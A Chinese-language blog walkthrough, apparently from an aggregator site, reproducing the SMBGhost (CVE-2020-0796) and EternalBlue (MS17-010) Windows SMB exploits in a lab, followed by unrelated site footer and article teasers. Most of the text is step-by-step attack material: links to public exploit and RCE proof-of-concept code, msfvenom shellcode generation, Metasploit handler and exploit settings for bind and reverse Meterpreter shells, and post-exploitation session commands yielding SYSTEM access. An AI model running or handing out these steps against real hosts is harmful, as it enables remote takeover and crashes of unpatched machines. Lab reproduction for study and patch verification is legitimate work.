永恒之黑和永恒之蓝 漏洞解析及复现

news2024/10/7 15:18:58

充当攻击机的机器是kali,另外需要关闭防火墙策略。

永恒之黑(CVE-2020-0796

靶机:windows 10的IP地址:192.168.200.30

原理:实现远程代码执行

注意:

这个脚本运行有时候会导致靶机蓝屏,需重启靶机,几次执行脚本知道得到shell。

漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
攻击poc:https://github.com/eerykitty/CVE-2020-0796-PoC
shell脚本:https://github.com/chompie1337/SMBGhost_RCE_PoC

检验

1.WIN10的防火墙和自动更新功能关闭。

2.在攻击机上对目标机进行检测,看其是否存在漏洞,检测目标存在漏洞。

1702443745_65793ae1877ec25dd533a.png!small?1702443746651

3.利用poc脚本对靶机发起攻击(kali中执行)。

python3 CVE-2020-0796.py 192.168.200.30

win10 就会出现蓝屏,攻击成功。

1702443754_65793aeaccca60edb33fa.png!small?1702443755852

反弹shell

1.生成反向连接木马。

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=1234 -b '\x00' -i 1 -f python

# 对端口号是1234进行监听

2.用生成的shellcode将shell脚本工具里面的exploit.py中的buf替换为USER_POYLOAD。保留名字,只替换内容。1702443763_65793af3a93c1345d3ea1.png!small?1702443765780

在真机中进行修改较方便,然后在将文件传入到KALI中去(按下CTRL+F将buf 替换为 user_payload)。

1702443772_65793afca0629b8f381bb.png!small?1702443774587

3.开启msf模块。

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 1234
set rhost 192.168.200.30
run

1702443782_65793b06018ec89ba5ebb.png!small?1702443783264

注意:1.监听模块的端口设置,和生成的木马设置的端口要相同,用于反弹shell的入口的。

2.倘若出现问题,可以使用show options进行查看自己设置的信息。

4.运行exploit.py脚本,发起攻击,并且反弹shell。

(如果此处失败,请多次尝试 回车 即可)

1702443789_65793b0d4bc1e8492ce4d.png!small?1702443790497

5.执行成功后,查看监听的的串口,成功得到shell(这里需要输入shell获取靶机权限,以此更方便的查看)。

1702443795_65793b13bb1e94968bb9e.png!small?1702443797174

输入ipconfig之后可以看到靶机的IP地址,实现了远程代码执行,这时就可以在此最高权限下进行玩耍!

1702443802_65793b1a6be46bb745674.png!small?1702443803923

永恒之蓝漏洞复现(ms17-010)

IP地址可能会有变化,如本文思路有能帮助到您的地方,不胜荣幸!

基础命令

#进入msf:msfconsole
#使用search查找相关漏洞: search  ms17-010
#使用use进入模块: use 数字  
#使用info查看模块信息:info 
#设置poc的连接方式:set payload windows/x64/meterpreter /reverse_tcp  
#查看模块需要配置的参数:show options
#设置参数:set RHOST 192.168.200.4
#攻击:exploit / run 
#回退:back

后渗透命令

#查看当前用户:getuid
#进入shell:shell
#解决shell乱码:chcp 65001
#退出shell:exit
#把会话放到后台:background
#查看所有会话:sessions
#进入某个会话: sessions -i id号
#删除会话:sessions -k id号

环境准备

攻击机:kali:192.168.200.1

被攻击机:win7 x64 192.168.200.4 关闭防火墙

1 主机发现

在kali中使用nmap扫描win7

Nmap -sS 192.168.200.4

如下发现主机开启了445端口,操作系统类型可能为win7。

1702443820_65793b2ce8733e3c7d265.png!small?1702443822318

WIN7IP地址。

1702443829_65793b356f6f57434f2c7.png!small?1702443830568

WIN7MAC地址。

1702443837_65793b3d1bfc1352008ba.png!small?1702443838143

2 漏洞探测

先进入msf,然后搜寻ms17-010的漏洞模块。

Msfconsole   
#搜寻模块:search ms17-010 
#使用模块:use 3 

我们先使用scanner模块对主机进行扫描,检测是否存在漏洞,使用use 3。

1702443849_65793b49001be551f18f6.png!small?1702443850255

1702443855_65793b4f10df609a16fb4.png!small

1702443864_65793b58be5c1e2b7d6ce.png!small?1702443865791

进入到该模块之后,可以使用info查看该漏洞模块的具体介绍信。

info

那怎么利用这个模块来对主机进行扫描了?使用show options选项,查看我们要输入的具体参数,其中标注了yes的选项是必须的参数,若这个参数为空,则需要我们填写。RHOSTS选项为空,所以我们需要填写,RHOSTS代表要攻击的目标。输入r然后按tab键可以自动补全该参数。

show options
set rhosts 192.168.200.4

1702443893_65793b7530d255a83bc14.png!small?1702443894495

1702443899_65793b7b6ce78cd7e06eb.png!small?1702443900719

下面就可以执行扫描攻击。

run

显示主机很可能能够会受到永恒之蓝漏洞的攻击。

1702443906_65793b821b4a98b1c047c.png!small?1702443907235

3 漏洞攻击

检测存在漏洞后,就可以尝试对漏洞进行攻击,我们选择漏洞利用模块,然后和上面的操作一样,填写必须的参数。

search 17-010
use 0
#设置payload连接的方式,reverse_tcp为反向连接,即受害机主动连接攻击机,以获取shell
set payload windows/x64/meterpreter/reverse_tcp
show options
set rhosts 192.168.200.4

1702443921_65793b913ea9b5d2b8f25.png!small?1702443922713

1702443925_65793b95c533251a0c646.png!small?1702443927274

执行攻击,返回一个meterpreter 会话,通过该会话可以控制目标主机,成功拿下主机system权限。

1702443933_65793b9d6cae08b5669fb.png!small?1702443934676

拿到主机权限后,可以进入该主机的shell(cmd),执行cmd命令。

#进入dos命令行:shell
#切换编码,解决乱码问题:chcp 65001
#cmd命令的执行:ipconfig

1702443942_65793ba65af812ca150e4.png!small?1702443943518

1702443948_65793bac64eb7c2f7faf5.png!small?1702443949605

至此,整个攻击过程结束。暂时不用这个会话了,可以退出当前shell,然后把该会话放到msf后台。

exit
background

1702443956_65793bb41c77c0dc5f91f.png!small?1702443957248

查看所有连接的会话,随时可以进入某个会话。

sessions
sessions -i id号

1702443963_65793bbb4d78003e62a9e.png!small?1702443964562

完结!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1462513.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

OpenAI Sora引领AI跳舞视频新浪潮:字节跳动发布创新舞蹈视频生成框架

OpenAI的Sora已经引起广泛关注,预计今年AI跳舞视频将在抖音平台上大放异彩。下面将为您详细介绍一款字节跳动发布的AI视频动画框架。 技术定位:这款框架采用先进的diffusion技术,专注于生成人类舞蹈视频。它不仅能够实现人体动作和表情的迁移…

(done) 什么是正定矩阵?Positive Definite Matrices

正定矩阵的定义:https://baike.baidu.com/item/%E6%AD%A3%E5%AE%9A%E7%9F%A9%E9%98%B5/11030459 正定矩阵的作用、验证视频:https://www.bilibili.com/video/BV1Ag411M76G/?spm_id_from333.337.search-card.all.click&vd_source7a1a0bc74158c6993c…

webpack配置杂记

1、热更新 安装webpack-dev-server : npm i webpack-dev-server -D webpack.config.js配置 module.exports {// 其他配置...,// 热更新配置devServer: {host: "localhost",port: 3000,}, } 2、入口entry:使用相对路径们也就是webpack程序运行的路径&am…

PNAS|多倍体物种极致突破

羊草(Leymus chinensis)是欧亚草原多年生优势草本植物,以其显著的适应性和饲料品质而闻名。尽管人们越来越认识到其生态和经济价值,但基因组序列的缺失及其遗传转化所面临的挑战限制了其在基础研究和野生植物改良方面的关键应用。…

transformer,视觉模型改进论文的讨论

1、efficientVIT efficientformer 模型 快48.9倍的新SAM!清华&MIT&英伟达开源EfficientViT-SAM:精度不变,原地起飞 YOLOv8改进 | 2023主干篇 | EfficientViT替换Backbone(高效的视觉变换网络) - Snu77的文章 -…

《Python 语音转换简易速速上手小册》第5章 音频数据处理(2024 最新版)

文章目录 5.1 音频数据的基本处理5.1.1 基础知识5.1.2 主要案例:音频剪辑工具案例介绍案例 Demo案例分析 5.1.3 扩展案例 1:自动音量调节器案例介绍案例 Demo案例分析 5.1.4 扩展案例 2:语音识别预处理案例介绍案例 Demo案例分析 5.2 使用 Py…

dell r740服务器黄灯闪烁维修现场解决

1:首先看一下这款DELL非常主力的PowerEdge R740服务器长啥样,不得不说就外观来说自从IBM抛弃System X系列服务器后,也就戴尔这个外观看的比较顺眼。 图一:是DELL R740前视图(这款是8盘机型) 图二&#xff…

散列表Hash Table(哈希表)+散列函数+散列冲突及散列表插入、查找的时间复杂度分析

散列表(Hash Table)又名哈希表/Hash表,是根据键key直接访问在内存存储位置的值value的数据结构,它是由数组演化而来的,利用了数组支持按照下标进行随机访问数据的特性。但这个键key有时不是纯数值,不能够做为数组的下标,这时就可以把这个非纯数值的key转…

MediaPipe姿态识别pose_landmark_lite.tflite缺失问题

背景说明 最近朋友提供了一个姿态识别的简易代码,让自己帮忙调试改进一下。自己打开代码看了一下,使用的是mediapipe 框架进行的人体姿态检测,当我在配置好环境初始化pose(姿态检测对象)时出现了错误:Downl…

喀秋莎画中画怎么设置 喀秋莎画中画视频怎么导出 喀秋莎什么意思 camtasia studio下载

画中画视频,顾名思义,就是在一个视频中有两个画面,游戏解说、微课等类型的视频常常就以画中画的形式出现。作为一款专业的视频编辑软件,使用camtasia可以轻松地制作画中画视频并导出。接下来我将为大家介绍:喀秋莎画中…

Spring Boot中实现列表数据导出为Excel文件

点击下载《Spring Boot中实现列表数据导出为Excel文件》 1. 前言 本文将详细介绍在Spring Boot框架中如何将列表数据导出为Excel文件。我们将通过Apache POI库来实现这一功能,并解释其背后的原理、提供完整的流程和步骤,以及带有详细注释的代码示例。最…

bilibili尚硅谷周阳老师JUC并发编程与源码分析课程笔记第十一章——Synchronized与锁升级

文章目录 先从阿里及其它大厂面试题说起本章路线总纲阿里手册对锁使用的强制要求Synchronized锁优化的背景Synchronized锁的升级过程Synchronized锁的升级标志 Synchronized的性能变化Java5以前,只有Synchronized,这个是操作系统级别的重量级锁为什么每一…

推荐一款Vite中加载svg的小工具

最近开发中使用到一个好玩的Vite三方小插件vite-plugin-svg-icons很实用,可以辅助我们开发过程中快速加载svg小图标。其原理是在Vite编译器的时候通过一次性的DOM操作将SVG插入DOM结构中,然后通过使用内联SVG进行加载访问,极大的方便了我们的…

【码银送书第十二期】世界顶级名校计算机专业,都在用哪些书当教材?

清华、北大、MIT、CMU、斯坦福的学霸们在新学期里要学什么?今天我们来盘点一下那些世界名校计算机专业采用的教材。 01《深入理解计算机系统》 (原书第3版) 作者:兰德尔 E.布莱恩特 大卫 R. 奥哈拉伦 推荐理由:卡内基…

怿星科技测试实验室(EPT LABS)服务介绍

据中国汽车工业协会数据,2023年我国汽车产销量分别达3016.1万辆和3009.4万辆,年产销量双双创历史新高,汽车行业进入了新时代。新汽车时代下的OEM竞争更激烈,汽车电子架构更复杂,研发周期更短,软件迭代更快&…

vue3项目引入本地js文件,实现一个音频播放按钮

目前有一个需求就是在网页上放置一个音乐控制按钮,并且是在vue3项目里面。于是小白的我遇到了2个问题,第一个问题是如何实现没有进度条的播放按钮,这个网上有现成的代码,可以通过js代码切换不同的图片或者是别的样式,并…

电脑wifi丢失修复

当你打开电脑突然发现wifi功能不见了,可以先查看一下网卡的状态 在控制面板中找到设备管理器,打开就能找到网络适配器, 我这里是修复过的,wifi丢失后这里可能会显示WALN是丢失的,其他项显示黄色感叹号。 如何修复呢…

170基于matlab的DNCNN图像降噪

基于matlab的DNCNN图像降噪,网络分为三部分,第一部分为ConvRelu(一层),第二部分为ConvBNRelu(若干层),第三部分为Conv(一层),网络层数为17或者20层…

写给正在迷茫的你:4年程序员职业生涯感悟

前言 最近有许多小伙伴找我来咨询Python,我来讲几个极其重要,但是大多数Python小白都在一直犯的思维错误吧!如果你能早点了解清楚这些,会改变你的编程学习生涯的。小编这一期专门总结了大家问的最多的,关于学习Python…

Spring Boot与Netty:构建高性能的网络应用

点击下载《Spring Boot与Netty:构建高性能的网络应用》 1. 前言 本文将详细探讨如何在Spring Boot应用中集成Netty,以构建高性能的网络应用。我们将首先了解Netty的原理和优势,然后介绍如何在Spring Boot项目中集成Netty,包括详…